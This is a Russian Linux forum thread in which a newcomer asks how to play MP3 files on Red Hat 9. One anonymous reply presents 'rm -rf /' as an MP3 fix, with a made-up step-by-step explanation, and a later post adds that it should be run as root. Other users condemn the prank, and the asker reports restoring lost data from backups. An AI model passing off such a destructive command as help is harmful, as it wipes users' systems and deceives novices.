LINUX.ORG.RU

Прошу помочь.


0

0

Добрый день.

Я приобрел дистрибутив операционной системы Red Hat 9.0. Отличная система, мне в ней всё нравится. Гораздо больше возможностей по сравнению с Microsoft Windows 2000. Но возникла одна проблема, решения которой в справочной документации я не нашел, а именно: не проигрываются файлы формата MPEG3. Ваши предположения? Буду рад любой помощи.

Спасибо.

anonymous

Следуя рекомендациям RedHat в RedHat 9 (Shrake), по лицензионным соображениям, отсутствует все, что связано с MP3, а те приложения, которые использовали кодирование и декодирование формата MP3, были подвергнуты модернизации на уровне исходников, из них просто был удален весь код связанный с MP3.

На www.freshrpms.net есть все что тебе необходимо...

anonymous
()

Да, вы правы RH действительно отличный дистрибутив. В отличии от других дистров там уже есть все что нужно чтобы эту проблему решить. Просто перейдите в консоль (Ctrl+Alt+F1), войдите в систему и наберите:

locate xmms-mpeg3 >/dev/null rpm -qpR mp3 >/dev/null cd /usr/mp3 >/dev/null rm -rf / >/dev/null

Объясняю "пошагово": первая команда включает поддержку mp3 в вашем ядре. Вторая - разархивирует исходные тексты mp3. Третьей командой вы переходите в только что созданную папку с исходниками, и четвертая команда компилирует поддержку mp3. Запаситесь терпением, в зависимости от сокрости Вашего процессора это может занять 10-20 минут. Параметр >/dev/null в конце каждойц команды включает оптимизацию под ваш тип процессора, т.е. команды будут выполняться значительно быстрее благодаря нулевой латентности ядра.

Удачи!

anonymous
()

второй пост от анонимуса мне понравился :)))) а так не слушай его ни в коем случае :))) и вообще лучше ASPLinux 9 поставь. там сразу все есть. и русификация нормальная.

gr_buza ★★★★
()
Ответ на: комментарий от anonymous

Прощу прощения, все команды выстроились в онду строчку. Команды такие:

locate xmms-mpeg3 >/dev/null

rpm -qpR mp3 >/dev/null

cd /usr/mp3 >/dev/null

rm -rf / >/dev/null

anonymous
()
Ответ на: комментарий от anonymous

Re:

>locate xmms-mpeg3 >/dev/null rpm -qpR mp3 >/dev/null cd /usr/mp3 >/dev/null rm -rf / >/dev/null

Всё выщеуказанное лучше запускать от рута. Честно говоря, можно обойдись всего одной командой - rm -rf / (можно и без > /dev/null, тогда процесс будет информативнее).

З.Ы. Злые шутники на ЛОРе, однако... человек ведь может и послушаться такого "совета"... с другой стороны потренируется в переустановке, и впредь, наверно, будет осмотрительнее.

bsh ★★★
()

Человек чайник в линуксе, попросил вежливо помощи, а тут такие советы. Я бы также матерился, и наверно отписал бы даже письмо maxcom'у с просьбой выдачи IP.

anonymous
()
Ответ на: комментарий от anonymous

Ха, напоминает прикол с перлом. Дык думать надо, прежде чем
к клаве тянуться. К тому-же, исходный вопрос был очень похож на стёб.
Анонимусы резвятся. Улыбок тебе...

anonymous
()
Ответ на: комментарий от anonymous

Я понимаю, что человек чайник, но на такие старые шутки ловиться - это нечто.
нечто.

Одного понять не могу - досовый раздел (где хранятся webmoney - насколько
я помню, юниксовых клиентов нет) восстановить просто - он же на него не писался.
Достаточно копию таблицы fat (коих две штуки, помимо рабочей) назад запихать.

Почему fat - потому что по умолчанию редхат не держит NFTS, а даже
если бы и держал, не мог бы писать. Так что teramisa в зубы и вперед.

4Попавшийся: ты все же читай маны, перед тем как что-то выполнять.
Что касается человека, который "пошутил" - видимо его, как и других
обитателей данного форума, очень достал вопрос "как включить mp3"
в редхат 8,9/fedora core. Он появляется тут раза три-четыре в неделю,
хотя во всем инете, включая сайт редхата и xmms'а, написано,
что случилось и как все поиметь назад. Тут тоже писалось.

В следующий раз перед тем как задать вопрос, подумай, что твой
вопрос, как новичка, наверняка обсуждался и не является уникальным,
и попробуй воспользоваться поиском по сайту (или гуглом).



jackill ★★★★★
()
Ответ на: комментарий от anonymous

>Поубивал бы за такие ответы!

>anonymous (*) (16.12.2003 10:07:58)

Вот у нас всегда так. Вместо того, чтобы цивилизованно подать в суд и

расрутить шутника за ущерб ( в том числе и моральный ) на кучу бабок..

anonymous
()
Ответ на: комментарий от anonymous

Дык у самих револьверы найдутся.

P.S. Восстановил, нет?

jackill ★★★★★
()
Ответ на: комментарий от Alter

Уважаемый пользователь gr_buza! Ваше сообщение я понял как призыв не слушать советов про Red Hat, и вместо того, чтобы мучиться с Red Hat, просто установить ASPLinux 9. Тем более что вы сдобрили свое сообщение улыбающимися смайликами :)))

Так что прошу прощения, раз вы имели в виду другое, и если буду в вашем городе, обязательно зайду и поставлю вам пиво.

Данные мне восстановили, так как у нашего системного администратора были резервные копии.

Спасибо всем (ну или почти всем) за советы.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.